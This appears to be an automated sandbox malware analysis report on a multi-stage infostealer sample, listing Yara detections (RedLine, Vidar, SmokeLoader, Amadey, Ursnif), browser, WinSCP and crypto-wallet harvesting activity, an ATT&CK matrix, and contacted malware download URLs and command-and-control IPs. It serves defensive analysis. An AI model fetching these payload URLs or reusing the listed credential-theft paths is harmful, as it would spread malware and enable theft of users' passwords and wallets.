Source: Yara match	File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPED

Yara detected Ursnif

Source: Yara match	File source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTR
Source: Yara match	File source: 19.2.6644.exe.950000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.6644.exe.12794a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.6644.exe.12794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.556838350.0000000001279000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected SmokeLoader

Source: Yara match	File source: 0000002A.00000002.520066119.0000000000591000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.520020559.00000000003D1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 5080, type: MEMORYSTR
Source: Yara match	File source: 11.2.tiddsjj.930e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.tiddsjj.950000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.S2XJ2wbz7u.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.tiddsjj.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.S2XJ2wbz7u.exe.870000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.S2XJ2wbz7u.exe.860e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.378864135.0000000002611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.246440191.0000000000870000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.327477801.0000000000D61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.366967601.0000000000950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.378578278.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.308924439.0000000003321000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.327296717.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Amadey bot

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0000000F.00000002.556830130.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.542120947.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rovwer.exe PID: 4764, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: 00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.464734781.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.463148223.0000000000910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.456037519.0000000001560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 86EE.exe PID: 4972, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8C00.exe PID: 5400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 86EE.exe PID: 5560, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8C00.exe PID: 5936, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ElectrumE#
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: JaxxE#
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ExodusE#
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: EthereumE#
Source: 2B4A.exe, 0000000C.00000003.399248246.0000000000856000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: set_UseMachineKeyStore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\86EE.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\86EE.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\86EE.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\86EE.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\86EE.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Source: Yara match	File source: 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2B4A.exe PID: 5260, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 12.2.2B4A.exe.2840000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.2B4A.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.2B4A.exe.740e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.2B4A.exe.2540000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.2B4A.exe.2840000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.2B4A.exe.2540ee8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.2B4A.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.2B4A.exe.22ba196.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.2B4A.exe.856710.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.2B4A.exe.780000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.2B4A.exe.22ba196.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.2B4A.exe.2540ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.2B4A.exe.22bb07e.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.453D.exe.774fd8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.2B4A.exe.2540000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.453D.exe.774fd8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.2B4A.exe.22bb07e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.3.2B4A.exe.856710.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000003.399248246.0000000000856000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.557498334.0000000000774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.397792222.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.561654188.000000000227A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.526298773.0000000000740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.517740314.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.590764503.0000000002840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2B4A.exe PID: 5260, type: MEMORYSTR

Yara detected Ursnif

Source: Yara match	File source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTR
Source: Yara match	File source: 19.2.6644.exe.950000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.6644.exe.12794a0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.6644.exe.12794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.556838350.0000000001279000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected SmokeLoader

Source: Yara match	File source: 0000002A.00000002.520066119.0000000000591000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.520020559.00000000003D1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 5080, type: MEMORYSTR
Source: Yara match	File source: 11.2.tiddsjj.930e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.tiddsjj.950000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.S2XJ2wbz7u.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.tiddsjj.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.S2XJ2wbz7u.exe.870000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.S2XJ2wbz7u.exe.860e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.378864135.0000000002611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.246440191.0000000000870000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.327477801.0000000000D61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.366967601.0000000000950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.378578278.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.308924439.0000000003321000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.327296717.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Vidar stealer

Source: Yara match	File source: 00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.464734781.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.463148223.0000000000910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.456037519.0000000001560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 86EE.exe PID: 4972, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8C00.exe PID: 5400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 86EE.exe PID: 5560, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8C00.exe PID: 5936, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
1 Spearphishing Link	2 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	14 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Exploitation for Client Execution	1 Scheduled Task/Job	712 Process Injection	11 Deobfuscate/Decode Files or Information	1 Input Capture	2 File and Directory Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	2 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	3 Obfuscated Files or Information	1 Credentials in Registry	44 System Information Discovery	SMB/Windows Admin Shares	1 Input Capture	Automated Exfiltration	5 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	1 Scheduled Task/Job	1 Services File Permissions Weakness	1 Registry Run Keys / Startup Folder	33 Software Packing	NTDS	441 Security Software Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	126 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	1 Services File Permissions Weakness	1 DLL Side-Loading	LSA Secrets	231 Virtualization/Sandbox Evasion	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 File Deletion	Cached Domain Credentials	13 Process Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	11 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	231 Virtualization/Sandbox Evasion	Proc Filesystem	1 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	712 Process Injection	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	1 Hidden Files and Directories	Network Sniffing	Process Discovery	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	1 Services File Permissions Weakness	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
S2XJ2wbz7u.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll	100%	Avira	HEUR/AGEN.1233121
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll	100%	Avira	HEUR/AGEN.1233121
C:\Users\user\AppData\Local\Temp\3790.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\tiddsjj	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\6CEC.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\453D.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\816F.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\59FE.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\2B4A.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\6644.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\argq[1].exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\argq[1].exe	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll	88%	ReversingLabs	Win32.Infostealer.Decred
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll	71%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\2B4A.exe	NaN%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\2B4A.exe	73%	ReversingLabs	Win32.Trojan.Raccoon
C:\Users\user\AppData\Local\Temp\453D.exe	21%	ReversingLabs
C:\Users\user\AppData\Roaming\PingboardCache\argq.exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\PingboardCache\argq.exe	0%	Metadefender		Browse
C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll	88%	ReversingLabs	Win32.Infostealer.Decred
C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll	71%	Metadefender		Browse

Unpacked PE Files

Source	Detection	Scanner	Label	Download
21.3.6CEC.exe.6c0000.0.unpack	100%	Avira	TR/Downloader.Gen2	Download File
19.2.6644.exe.950000.2.unpack	100%	Avira	HEUR/AGEN.1245293	Download File
19.3.6644.exe.940000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
11.3.tiddsjj.950000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.S2XJ2wbz7u.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
11.2.tiddsjj.930e67.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
11.2.tiddsjj.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.S2XJ2wbz7u.exe.860e67.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
19.2.6644.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen7	Download File
0.3.S2XJ2wbz7u.exe.870000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
19.2.6644.exe.930e67.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File

Domains

Source	Detection	Scanner	Link
cdn-102.anonfiles.com	3%	Virustotal	Browse
raw.githubusercontent.com	1%	Virustotal	Browse
o36fafs3sn6xou.com	15%	Virustotal	Browse
anonfiles.com	4%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://tempuri.org/Entity/Id12Response	0%	URL Reputation	safe
http://tempuri.org/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id2Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id21Response	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://tempuri.org/Entity/Id15Response	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Y	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
http://o3b1wk8sfk74tf.com/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/G	0%	URL Reputation	safe
http://tempuri.org/Entity/Id24Response	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/u	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/c	0%	URL Reputation	safe
http://tempuri.org/Entity/Id5Response	0%	URL Reputation	safe
http://tempuri.org/Entity/Id10Response	0%	URL Reputation	safe
http://o3npxslymcyfi2.com/	0%	URL Reputation	safe
http://tempuri.org/Entity/Id8Response	0%	URL Reputation	safe
http://o3l3roozuidudu.com/	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://o36fafs3sn6xou.com/Mozilla/5.0	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://193.56.146.174/	0%	Avira URL Cloud	safe
http://svedbergbryanthusnonarithmetical.com/v6/yoae.php?dfkt=6	0%	Avira URL Cloud	safe
http://193.56.146.174/g84kvj4jck/index.phpIM	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/decoder1989/Wallet/main/Crypted.exe	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id4Sy(5	0%	Avira URL Cloud	safe
http://91.213.50.70/Wavafursq.jpeg	100%	Avira URL Cloud	malware
http://193.56.146.174/g84kvj4jck/index.php)M	0%	Avira URL Cloud	safe
http://2w3.56.146.174/g84kvj4jck/index.php	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id22Response(5	0%	Avira URL Cloud	safe
http://svedbergbryanthusnonarithmetical.com/	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id4(5	0%	Avira URL Cloud	safe
http://116.202.5.101:80	100%	Avira URL Cloud	malware
http://www.fontbureau.comol	0%	Avira URL Cloud	safe
http://193.56.146.174/g84kvj4jck/index.php?scr=1kvj4jck/index.php	100%	Avira URL Cloud	malware
http://193.56.146.174/g84kvj4jck/index.php?scr=1	100%	Avira URL Cloud	malware
http://193.56.146.174/g84kvj4jck/Plugins/cred64.dllming	100%	Avira URL Cloud	malware
http://193.56.146.168/mia/solt.exe	100%	Avira URL Cloud	malware
http://91.213.50.70/Wavafursq.jpeg&BKl:	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id1Response(5	0%	Avira URL Cloud	safe
https://cdn-102.anonfiles.com/p8DdCeH9yd/c1844f86-1668548628/TELEGRAM.exe	0%	Avira URL Cloud	safe
https://www.tiktok.com/@user6068972597711	0%	Avira URL Cloud	safe
http://193.56.146.174/g84kvj4jck/Plugins/cred64.dlltE	100%	Avira URL Cloud	malware
http://193.56.146.174/U8eZkQ0Y1ZtSx2oLs	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cdn-102.anonfiles.com	195.96.151.51	true	true	3%, Virustotal, Browse	unknown
bitbucket.org	104.192.141.1	true	false		high
u.to	195.216.243.155	true	false		high
github.com	140.82.121.4	true	false		high
raw.githubusercontent.com	185.199.108.133	true	true	1%, Virustotal, Browse	unknown
t.me	149.154.167.99	true	false		high
cdn.discordapp.com	162.159.133.233	true	false		high
o36fafs3sn6xou.com	77.232.37.228	true	true	15%, Virustotal, Browse	unknown
anonfiles.com	45.154.253.151	true	true	4%, Virustotal, Browse	unknown
svedbergbryanthusnonarithmetical.com	84.21.172.142	true	false		unknown
hoteldostyk.com	43.231.112.109	true	true		unknown
iplogger.com	148.251.234.93	true	false		high
s3-w.us-east-1.amazonaws.com	52.217.206.73	true	false		high
youtube-ui.l.google.com	172.217.168.14	true	false		high
srshf.com	108.167.141.212	true	true		unknown
transfer.sh	144.76.136.153	true	false		high
1ecosolution.it	46.252.148.24	true	true		unknown
windowsupdatebg.s.llnwi.net	178.79.225.0	true	false		unknown
cdn-104.anonfiles.com	195.96.151.53	true	true		unknown
bbuseruploads.s3.amazonaws.com	unknown	unknown	false		high
2w3ke1f81kujb1erhj396kfejh2wgw.kgpoaj9k4sgjd4aitghsrtuxhq	unknown	unknown	true		unknown
lentaphoto.at	unknown	unknown	true		unknown
www.youtube.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://193.56.146.168/mia/solt.exe	true	Avira URL Cloud: malware	unknown
https://iplogger.com/2bibu4	false		high
https://raw.githubusercontent.com/decoder1989/Wallet/main/Crypted.exe	false	Avira URL Cloud: safe	unknown
http://193.56.146.174/g84kvj4jck/index.php?scr=1	false	Avira URL Cloud: malware	unknown
http://o3b1wk8sfk74tf.com/	true	URL Reputation: safe	unknown
https://bitbucket.org/globallinstall/updatenow1.3.5/downloads/downloadsupdated.now-1.3.5.exe	false		high
https://t.me/deadftx	false		high
http://o3npxslymcyfi2.com/	true	URL Reputation: safe	unknown
http://o3l3roozuidudu.com/	true	URL Reputation: safe	unknown
https://cdn-102.anonfiles.com/p8DdCeH9yd/c1844f86-1668548628/TELEGRAM.exe	false	Avira URL Cloud: safe	unknown
https://www.tiktok.com/@user6068972597711	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://193.56.146.174/	rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://91.213.50.70/Wavafursq.jpeg	816F.exe, 0000001A.00000002.564423436.0000000002508000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	2B4A.exe, 0000000C.00000002.595351111.0000000002AA2000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.493239305.00000000275C1000.00000004.00000800.00020000.00000000.sdmp, 84206842141166370440363339.45.dr, 41479232570897308364731578.45.dr	false		high
http://193.56.146.174/g84kvj4jck/index.phpIM	rovwer.exe, 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	41479232570897308364731578.45.dr	false		high
http://116.202.5.101:80	86EE.exe, 0000002D.00000003.476529249.0000000001523000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id12Response	2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://193.56.146.174/g84kvj4jck/Plugins/cred64.dllming	rovwer.exe, 0000000F.00000002.548035575.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.google	86EE.exe, 0000002D.00000003.488228184.00000000275BE000.00000004.00000800.00020000.00000000.sdmp, 86EE.exe, 0000002D.00000003.489485701.00000000273BD000.00000004.00000800.00020000.00000000.sdmp, 41578002959771932956378793.45.dr, 94088433411392910584223625.45.dr	false		high
http://svedbergbryanthusnonarithmetical.com/v6/yoae.php?dfkt=6	vbc.exe, 00000021.00000002.540979642.0000000007542000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000021.00000002.523011791.0000000000998000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/	2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id2Response	2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	816F.exe, 0000001A.00000002.592418657.0000000007352000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id21Response	2B4A.exe, 0000000C.00000002.592021654.0000000002901000.00000004.00000800.00020000.00000000.sdmp, 2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id4Sy(5	2B4A.exe, 0000000C.00000002.593366709.0000000002996000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.google.com/chrome/answer/6315198?product=	94088433411392910584223625.45.dr	false		high
